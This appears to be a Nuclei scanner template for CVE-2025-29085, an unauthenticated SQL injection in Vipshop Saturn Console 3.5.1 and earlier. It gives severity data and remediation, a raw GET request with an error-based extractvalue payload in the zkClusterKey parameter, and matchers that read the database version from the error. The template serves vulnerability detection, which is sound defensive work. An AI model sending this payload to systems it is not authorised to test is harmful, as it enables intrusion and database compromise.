id: CVE-2025-29085 info: name: Vipshop Saturn Console <= 3.5.1 - SQL Injection via ClusterKey Component author: iamnoooob,rootxharsh,pdresearch severity: critical description: | SQL injection vulnerability in vipshop Saturn v.3.5.1 and before allows a remote attacker to execute arbitrary code via /console/dashboard/executorCount?zkClusterKey component. impact: | Unauthenticated attackers can execute arbitrary SQL queries through the zkClusterKey parameter, potentially extracting sensitive database information and compromising Saturn Console. remediation: | Upgrade to Vipshop Saturn version 3.5.2 or later that properly sanitizes SQL input parameters. reference: - https://github.com/advisories/GHSA-49v8-p6mm-3pfj - https://gist.github.com/Cafe-Tea/bcef0d7a2bdb5ec8e0d69de852fdc900 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-29085 cwe-id: CWE-89 epss-score: 0.30686 epss-percentile: 0.98209 metadata: verified: true tags: cve,cve2025,vipshop,sqli,vkev,vuln http: - raw: - | GET /console/dashboard/executorCount?zkClusterKey=1%27-extractvalue(1,concat(0x0a,version()))--%20- HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - "java.sql.SQLException: XPATH syntax error: '" extractors: - type: regex part: body internal: true name: version group: 1 regex: - "XPATH syntax error: '\\\\n(.*?)'" - type: dsl dsl: - '"Database Version: " + version' # digest: 4b0a00483046022100d8d4addbdc0d446603ed4a0bff932ca9396ad826801259f278e6b97ff5fb58b0022100d3984c48e8f4fe8e8c73fcbdef4bc94037f91694ea8cc4e9542ff28c5142d69c:922c64590222798bb761d5b6d8e72950